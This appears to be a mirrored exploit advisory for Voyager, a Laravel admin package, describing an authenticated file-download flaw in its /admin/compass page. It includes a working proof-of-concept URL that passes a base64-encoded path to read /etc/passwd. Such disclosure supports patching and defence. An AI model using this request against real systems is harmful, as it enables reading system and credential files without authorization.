Voyager Laravel Authentication Local File Download

Voyager Laravel Authentication Local File Download
2024-12-1 06:26:55 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

# Exploit Title: Voyager Laravel Authentication Local File Download # Description: - # Date: 21112024 # Exploit Author: Khunerable # Vendor Homepage: https://voyager.devdojo.com/ | https://github.com/thedevdojo/voyager # Tested on: Windows 11,Windows NT 10.0 ///////////////////////////////////////////////////////////////////////////////////////// POC : you need to log-in into admin dashboard to execute after login, access "/admin/compass" then access /admin/compass?download=base64encodedirandfile example : L2V0Yy9wYXNzd2Q= : /etc/passwd localhost/admin/compass?download=L2V0Yy9wYXNzd2Q=

Thanks for you comment!
Your message is in quarantine 48 hours.

文章来源: https://cxsecurity.com/issue/WLB-2024110050
如有侵权请联系:admin#unsafe.sh

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.